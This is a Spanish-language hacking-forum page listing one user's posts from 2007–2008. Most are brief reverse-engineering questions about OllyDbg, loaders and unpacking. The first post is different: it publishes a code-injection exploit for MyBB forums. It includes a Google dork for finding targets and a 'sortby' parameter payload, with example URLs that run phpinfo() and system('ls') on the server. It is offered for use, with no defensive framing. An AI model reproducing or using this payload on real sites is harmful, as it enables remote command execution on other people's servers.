elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Nivel Web / Otro BUG en MyBB en: 23 Enero 2008, 19:42 pm
He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"

Exploit:
Código:
'];<comando PHP>;exit;//

Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]

Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//

http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//

by zion ;D
Mi fuente.
2  Seguridad Informática / Nivel Web / Re: Cross-site scripting en Apache 1.3.x y 2.2.x en: 23 Diciembre 2007, 11:21 am
mas un XXS para estudiar
Gracias por la informacion.  :D
3  Seguridad Informática / Nivel Web / Re: SELECT junto con update sql injection en: 21 Diciembre 2007, 17:09 pm
A ver... no soy especialista en SQL injection pero si hablas de parametros creo que existe muchos metodos.

Un consejo, puedes mirar las opciones de algunos scanners donde figuran esas cadenas de prueba como por ejemplo /*, ' , etc. etc. que estan concatenados con los metodos SELECT y UPDATE.

Espero que te sirva el aporte

salud2
4  Programación / Ingeniería Inversa / fabricar un LOADER en: 27 Octubre 2007, 23:40 pm
hola, quisiera preguntar algo, si es que existe un programa o bien, la posibilidad de hacer que manipule direcciones de memoria de un programa y concatenarlo con acciones de otro programa. Por ejemplo: abro NOTEPAD y al dar clic en nuevo que me ejecute PAINT. He intentado con el Snippet Creator de Izcelion junto con el masm pero aun es dificil porque son muchas direcciones de memoria y codigo assembler que manejar. Si alguien tiene alguna idea de como hacerlo agradeceria mucho..
Gracias
5  Programación / Ingeniería Inversa / Re: ayuda ollydbg en: 10 Octubre 2007, 23:44 pm
valio muchisimo, gracias...
6  Programación / Ingeniería Inversa / Re: KONXISE ayuda en: 28 Septiembre 2007, 00:09 am
dale camarada, te envio enseguida porque ahora estoy sin conexion a internet..

gracias...


saludos....
7  Programación / Ingeniería Inversa / Re: KONXISE ayuda en: 24 Septiembre 2007, 21:00 pm
tienes razon, aunque siempre caigo en el intento de encontrar el OEP, pero sigo buscando gracias...

saludos...
8  Programación / Ingeniería Inversa / Re: ayuda ollydbg en: 24 Septiembre 2007, 20:57 pm
vale, gracias camarada, se agradece mucho...
9  Programación / Ingeniería Inversa / ayuda ollydbg en: 23 Septiembre 2007, 05:32 am
donde puedo conseguir plugins para ollydbg?
gracias
10  Programación / Ingeniería Inversa / KONXISE ayuda en: 22 Septiembre 2007, 23:37 pm
una ayudita con konxise
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines